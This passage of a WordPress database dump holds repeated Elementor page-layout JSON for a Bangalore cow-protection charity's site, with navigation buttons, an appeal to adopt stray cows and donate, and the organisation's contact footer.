ine_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a95afbf\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10919,1818,'_elementor_page_assets','a:0:{}'),(10921,1819,'_elementor_edit_mode','builder'),(10922,1819,'_elementor_template_type','wp-page'),(10923,1819,'_elementor_version','3.7.8'),(10924,1819,'_wp_page_template','elementor_canvas'),(10925,1819,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a95afbf\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10926,1819,'_elementor_page_assets','a:0:{}'),(10928,1820,'_elementor_edit_mode','builder'),(10929,1820,'_elementor_template_type','wp-page'),(10930,1820,'_elementor_version','3.7.8'),(10931,1820,'_wp_page_template','elementor_canvas'),(10932,1820,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a95afbf\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10933,1820,'_elementor_page_assets','a:0:{}'),(10936,1821,'_elementor_edit_mode','builder'),(10937,1821,'_elementor_template_type','wp-page'),(10938,1821,'_elementor_version','3.7.8'),(10939,1821,'_wp_page_template','elementor_canvas'),(10940,1821,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a95afbf\",\"elType\":\"widget\",\"settings\":{\"text\":\"Donate\",\"align\":\"center\",\"background_color\":\"#2A3F2D\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/campaigns\\/cattle-feed\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: 